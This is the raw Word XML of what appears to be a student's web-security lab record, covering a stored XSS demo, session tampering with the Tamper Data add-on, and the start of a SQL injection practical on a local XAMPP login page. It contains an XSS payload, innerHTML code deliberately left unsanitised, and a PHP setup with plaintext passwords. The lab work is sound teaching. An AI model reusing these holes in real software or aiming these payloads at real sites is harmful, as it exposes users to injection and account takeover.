      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A52F4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D49FC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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>displayComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C1F63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let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>storedComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>localStorage.getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>userComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D06CF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// </w:t>
      </w:r>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> VULNERABLE LINE (no sanitization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B17FB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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170C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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("output").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883B77F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 xml:space="preserve"> "&lt;div class='comment'&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>storedComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> + "&lt;/div&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00236FA3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E744A" w14:textId="77777777" w:rsidR="00A230A5" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A5" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>// Load stored comment on page refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10401DF1" w14:textId="77777777" w:rsidR="00A230A5" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A5" w:rsidP="00170CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>displayComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C96D5D" w14:textId="77777777" w:rsidR="00A230A5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752ED8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931F29" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="006E5BE8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CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F4A21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=x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onerror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=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B8C7C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F9493C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F6EF51" wp14:editId="7B92FFDA">
            <wp:extent cx="5943600" cy="3075305"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1079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2026-02-20 10040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B7AFB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29D682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72593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0944E8" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRP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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ractical 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A53D38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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim- Session Impersonation with Firefox and Tamper Data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A4503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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tamper DATA add-on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A682B9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1. open the Firefox and download extension “Temper data”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF1A5A3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2. Add that extension in browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C1B0E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3. Now open Any Websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256D4CF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2ED22D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420567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D15FF" wp14:editId="11B69A4D">
            <wp:extent cx="5296619" cy="5004060"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2540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734" cy="5010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62066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A5DD0C" w14:textId="77777777" w:rsidR="006E5BE8" w:rsidRPr="00170CF1" w:rsidRDefault="006E5BE8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DCFBB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B6FF84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lastRenderedPageBreak/>
        <w:t>4. Now click on that Extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467548D7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5. Enter the URL in that Text box and start tempering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C782A70" w14:textId="77777777" w:rsidR="00E15045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FCA740" wp14:editId="2CCB60C4">
            <wp:extent cx="4287328" cy="3142209"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="203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8493" cy="316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0C55B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A01684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6. Now click on any objects of that websites your it will start to tempering the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C935B" w14:textId="77777777" w:rsidR="004919ED" w:rsidRPr="00170CF1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FDD5E3" w14:textId="77777777" w:rsidR="004919ED" w:rsidRDefault="004919ED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D26293" wp14:editId="2D83C287">
            <wp:extent cx="4485736" cy="3058543"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="279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99229" cy="306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33869" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00456A70">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:strike/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F97F0E9" w14:textId="77777777" w:rsidR="00E15045" w:rsidRPr="00170CF1" w:rsidRDefault="00E1504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6814E0" wp14:editId="1AEA5E8D">
            <wp:extent cx="2540610" cy="5476240"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1016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1922" cy="5500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70CF1"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170CF1" w:rsidRPr="00170CF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51A90C" wp14:editId="78871882">
            <wp:extent cx="2646452" cy="5467350"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="190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347"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2692186" cy="55618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1C92D" w14:textId="77777777" w:rsidR="00E15045" w:rsidRPr="00170CF1" w:rsidRDefault="00E1504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F9579" w14:textId="77777777" w:rsidR="00E15045" w:rsidRPr="00170CF1" w:rsidRDefault="00E1504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65F96E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1ECCD2" w14:textId="77777777" w:rsidR="00F24CBB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A488A8" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF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1B4BE1" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF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3ACF14" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1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271206" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00170CF1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</w:p>
    <w:p w14:paraId="49EB4F43" w14:textId="77777777" w:rsid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Practical 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CAA6F" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00170CF1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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NewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT" w:cs="TimesNewRomanPS-BoldMT"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT" w:cs="TimesNewRomanPS-BoldMT"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Perform SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F335026" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="00170CF1">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9683E4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b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PART 1 — Setup Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4EA39C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bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Start Server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E77315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Open </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">XAMPP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836DD8C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Start: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE1382" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="003613FD" w:rsidRDefault="00170CF1" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default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Apache </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F3F49" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default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MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054BC44A" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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14:paraId="46B60C98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bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Create Database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E0885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Open browser: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269C656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http://localhost/phpmyadmin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA99EC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1. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191FD3EB" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="00170CF1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2. Database name: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511A866" w14:textId="77777777" w:rsidR="00170CF1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3613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sqli_demo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41763C94" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="00170CF1">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFEC66A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3. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EC9BF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bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Create Table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E53F6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Click </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL tab </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">and paste: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C811B0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CREATE TABLE users ( </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B303B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id INT AUTO_INCREMENT PRIMARY KEY, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56101E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username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>VARCHAR(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50), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B509B7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password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>VARCHAR(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50) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42A1DF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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948D388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INSERT INTO users (username, password) VALUES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7FB58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('admin', 'admin123'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A25162" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="003613FD" w:rsidRDefault="00170CF1" w:rsidP="00170CF1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('student', 'student123'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15190488" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="00170CF1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Click </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF8668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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63643C0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b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">PART 2 — Create Vulnerable Website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17603A01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Go to your real </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>DocumentRoot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: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E0131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C:\Users\Admin\Desktop\xamp\htdocs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0A3EC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Create folder: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sqli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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD5685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Inside create 3 files: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD1897" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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3613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>index.php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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B951E77" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>connect.php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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE8B41" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613F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13FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52F11627" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EBB255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b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>connect.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613F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E252A64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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D80B0E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3613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mysqli_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(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MYSQLI_REPORT_OFF); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CF1ED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$conn = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"localhost", "root", "", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sqli_demo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"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849E2C5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if ($conn-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>connect_error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) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D78F4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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>die(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"Connection failed"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F661D3B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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7C2C2F" w14:textId="77777777" w:rsid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?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7F96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</w:p>
    <w:p w14:paraId="5DE8388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b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Login Form) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CDE897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&lt;!DOCTYPE html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660B641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&lt;html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CCDCE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&lt;head&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B02AC8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&lt;title&gt;SQL Injection Demo&lt;/title&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B66176C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&lt;/head&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D38C4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&lt;body&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48978953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&lt;h2&gt;Login Page&lt;/h2&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C11FC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&lt;form method="POST" action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>login.php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"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACAF2C6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Username: &lt;input type="text" name="username"&gt;&lt;</w:t>
      </w:r>
